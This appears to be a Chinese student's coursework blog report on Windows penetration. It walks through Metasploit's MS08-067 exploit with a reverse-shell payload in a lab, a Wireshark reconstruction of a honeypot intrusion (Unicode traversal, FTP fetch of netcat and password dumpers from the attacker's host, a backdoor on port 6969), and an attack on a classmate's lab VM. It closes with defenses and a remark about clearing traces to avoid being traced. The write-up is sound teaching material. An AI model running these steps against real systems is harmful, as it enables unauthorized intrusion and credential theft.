20253907 2025-2026-2《网络攻防实践》第6周作业

1. 实践内容

本次实验主要围绕 Windows 系统远程渗透攻击与安全分析展开,分为三个部分:

(1)Metasploit Windows Attacker 实践

使用 Metasploit 框架对 Windows 靶机上的 MS08-067 漏洞进行远程渗透攻击,获取目标主机的访问权。MS08-067 是 Windows 操作系统中一个经典的高危漏洞(CVE-2008-4250),通过 SMB 服务的 445 端口触发栈缓冲区溢出,攻击者可实现未经身份验证的远程代码执行,获取 SYSTEM 权限。该漏洞影响 Windows 2000、XP、Server 2003 等系统,曾被称为"蠕虫级漏洞",Conficker 蠕虫就是利用该漏洞大规模传播。

(2)取证分析实践

分析一次真实的 NT 系统破解攻击。攻击者 IP 为 212.116.251.162,目标为蜜罐主机 172.16.1.106(主机名 lab.wiretrip.net),通过流量分析还原攻击全过程,包括攻击工具识别、入侵方法分析、入侵后行为追踪等。

(3)团队对抗实践

攻方使用 Metasploit 选择漏洞对靶机进行攻击并获得控制权;防守方使用 Wireshark 监听网络数据包,分析攻击过程,提取关键信息。通过攻防对抗加深对渗透测试和流量分析的理解。

2. 实践过程

2.1 动手实践 Metasploit Windows Attacker

实验环境

虚拟机 角色 IP 地址
Kali 攻击机 192.168.200.6
Win2k Server 靶机 192.168.200.9

首先确认两台虚拟机网络互通,Kali 能够 ping 通 Win2k,记得先把机器打开。
image

步骤 1:启动 Metasploit 控制台

在 Kali 终端中输入:

sudo msfconsole

可以看到进入了metasploitable frame work。
image

步骤 2:搜索 MS08-067 漏洞模块

msf6 > search ms08_067

搜索结果中可以看到 exploit/windows/smb/ms08_067_netapi,这是利用 MS08-067 漏洞的核心模块。
image

步骤 3:加载漏洞利用模块

msf6 > use exploit/windows/smb/ms08_067_netapi

image

步骤 4:查看配置参数

msf6 exploit(ms08_067_netapi) > show options

可以看到需要配置 RHOSTS(目标主机 IP)和 LHOST(本地主机 IP)等参数。
image

步骤 5:设置 Payload

选择反向 TCP 连接的 payload:

msf6 exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp

反向连接 payload 可以避免防火墙限制,让靶机主动连接攻击机。
image

步骤 6:设置攻击参数

msf6 exploit(ms08_067_netapi) > set RHOST 192.168.200.9
msf6 exploit(ms08_067_netapi) > set LHOST 192.168.200.6

这一步一定要匹配好自己的靶机ip地址,由于自己之前的子网掩码设置是131,这里改成9,同时设置win2kserver为net8模式,实现在同一网段下攻击。
image

步骤 7:发起攻击

msf6 exploit(ms08_067_netapi) > exploit

攻击成功后,会显示 Meterpreter session opened 或直接进入目标主机的命令行界面。
image

成功利用 MS08-067 漏洞获取win2kserver靶机的远程访问权限。

2.2 取证分析实践:解码一次成功的 NT 系统破解攻击

实验目标:分析来自 212.116.251.162 的攻击者攻陷蜜罐主机 172.16.1.106(lab.wiretrip.net)的全过程。

步骤 1:打开流量文件并筛选

将学习通下载的流量文件在 Wireshark 中打开(记得修改后缀为pacp),使用过滤条件筛选攻击者和目标 IP 之间的流量:

ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106

步骤 2:识别攻击工具

通过分析数据包,发现攻击者使用了 msadc(2).pl 渗透攻击工具。判断依据是数据包中出现特征字符串 ADM!ROX!YOUR!WORLD,这是该工具的典型标志。攻击者通过 msadcs.dll 中存在的 RDS 漏洞进行 SQL 注入攻击,并执行了命令 cmd /c echo werd >> c:\fun
image

步骤 3:分析攻击者如何进入并控制系统

攻击者首先利用 Unicode 漏洞获取命令执行能力。在数据包中发现特殊字符串 %C0%AF,这是 / 的 Unicode 编码,攻击者通过该技巧绕过路径检查,成功打开系统启动文件 boot.ini。

随后攻击者利用 FTP 下载三个关键文件到目标系统:

  • nc.exe(NetCat,用于建立网络连接)
  • pdump.exe(密码提取工具)
  • samdump.dll(SAM 文件导出库)
    image

攻击者在靶机上建立了后门监听。通过对数据流进行追踪分析,定位到攻击者进入 6969 端口,将接收到的连接重定向给 cmd1.exe,从而建立远程交互式命令通道。

步骤 4:分析攻击者获得访问权限后的行为

攻击者获得控制权后进行了以下操作:

  • 在流7中,利用 IIS4.0Unicode 解码漏洞,成功读取服务器系统敏感文件 boot.ini
    image
  • 在流24中,尝试查看用户组信息:net groupnet localgroupnet group domain admins
    image
  • 尝试进行权限提升和横向移动
    image
  • 在流98中,使用了echo+open+213.116.251.162+>ftpcom 再打开213.116.251.162上的ftp服务
    image
  • 在流111中,删除了ftpcom清理痕迹,同时识别蜜罐并留下提示echo Hi, i know that this a ..is a lab server, but patch the holes! 😃 >>README.NOW.Hax0r
    image
    最后攻击者删掉了其上传的 .exe文件后离开

步骤 5:防御措施

针对此类攻击的防御措施:

  1. 及时安装安全补丁:微软早在 2008 年就发布了 MS08-067 的安全更新,及时打补丁可完全防御该漏洞
  2. 禁用不必要的服务:如不需要 SMB 服务,可在防火墙中阻止 139 和 445 端口
  3. 使用 IDS/IPS 检测:部署 Snort 等入侵检测系统,可检测针对 MS08-067 和 RDS 漏洞的攻击流量
  4. 限制 FTP 和 Telnet 等明文协议:防止攻击者利用这些协议下载恶意工具
  5. 定期审计系统日志:监控异常进程创建和用户行为

步骤 6:攻击者是否察觉目标为蜜罐

攻击者很可能察觉到了这是一台蜜罐主机,同时已经留下了信息
image

2.3 团队对抗实践

攻击方操作:自己作为攻击方的时候,尝试攻击室友王昺喆同学的机器。
注意:这里因为想按照教程采取反向攻击,所以把自己的kali的ip地址改成了192.168.3.125
攻击方信息

  • 攻击机:Kali Linux(192.168.3.125)
  • 靶机:Win2kserver(192.168.3.126)
  • 使用漏洞:MS08-067(CVE-2008-4250)
  • 使用工具:Metasploit Framework
    第一步:把kali设置成桥接模式,勾选物理
    image
    第二步:查看自动设置的kali的ip地址
    image
    第三步:按照之前步骤设置攻击参数,这里被攻击的靶机地址参数是王昺喆同学的Win2kserver靶机的ip地址192.168.3.126
msf6 exploit(ms08_067_netapi) > set RHOST 192.168.3.126
msf6 exploit(ms08_067_netapi) > set LHOST 192.168.3.125

由下图可知,攻击成功,进入对方的后端界面
image
第四步:输入dir测试是否能够访问成功,结果没问题,攻击成功!
image
最后做完记得把kali恢复原样,方便下次实验。

防守方操作(自己攻击自己,进行流量监听)
攻方信息

  • 攻击机:Kali Linux(192.168.200.6)
  • 靶机:Win2kserver(192.168.200.9)
  • 使用漏洞:MS08-067(CVE-2008-4250)
  • 使用工具:Metasploit Framework
    自己作为防守方使用 Wireshark 对攻击过程进行抓包分析,重点关注以下流量特征:
  1. SMB 流量异常:MS08-067 漏洞利用通过 SMB 协议的 445 端口进行,攻击数据包中存在特殊的 shellcode 特征
    image

  2. 反弹连接的流量:使用反向 payload 时,靶机会主动连接攻击机的监听端口,可通过过滤 tcp.port == 4444 等方式定位
    image

  3. 后续命令执行流量:获取 shell 后执行的命令(如 ipconfignet user)会在网络流量中留下痕迹
    image

防守方通过分析这些流量特征,可以还原攻击过程,识别攻击者的 IP、使用的漏洞和后续操作。

防守方分析要点

  • 识别异常 SMB 流量,发现漏洞利用特征
  • 追踪 TCP 流,提取攻击载荷
  • 分析反弹连接的建立过程
  • 记录攻击者执行的所有命令

3. 学习中遇到的问题及解决

  • 问题1:在实验一攻击时显示攻击失败
    解决方案1:请教昺喆同学后,得知把攻击机和靶机放在同一网段,继续采取方向攻击后正常
    image

    解决方案2:由于反向攻击需要两个子网掩码在同一网段,但是请教Deepseek之后,发现可以采取正向攻击,此时就不需要更改网段。

  • 问题2:在攻击同学的靶机的时候,攻击失败,原因是未成功设置网络适配器
    解决方案:将网络适配器的网络连接方式改为桥接模式。
    image

  • 问题3:在 Wireshark 中打开流量文件后,过滤条件输入后没有数据显示
    解决方案:确认 IP 地址是否输入正确,或者尝试使用ip.addr == 172.16.1.106单独过滤,再结合观察到的攻击者 IP 进行筛选。

4. 实践总结

实验六是一次生动的Windows安全攻防实操,综合利用各种攻击手段以及wireshark监听来进行攻击的操作以及监听,具体有以下收获:

首先,认识导MS08-067 这个漏洞的危害性和持久性。用 Metasploit 攻击的过程其实不复杂,几个命令就搞定了,但背后涉及缓冲区溢出、RPC 协议、SMB 服务等一系列底层知识。这让我意识到,做渗透测试不能只会敲命令,理解原理才能真正掌握。

其次,在取证分析部分,通过 Wireshark 看流量包,一步步还原攻击者的操作。从 Unicode 编码绕过,到 RDS 漏洞利用,再到 FTP 下载恶意工具,最后建立后门,整个过程很清晰。攻击者留下的 ADM!ROX!YOUR!WORLD 这种特征字符串,就像是签名一样,一眼就能认出是用了什么工具。这也提醒我,做攻击的时候也要注意清理痕迹,不然很容易被溯源。

这次实验让我对 Windows 系统安全攻防有了更直观的认识,并且进行了一次生动的局域网下的团队攻防实操演练,加强了对网络攻防的理解,提升了网络安全防范意识,比如出去尽量别连对方的局域网。

posted @ 2026-04-24 20:52  navada  阅读(44)  评论(0)    收藏  举报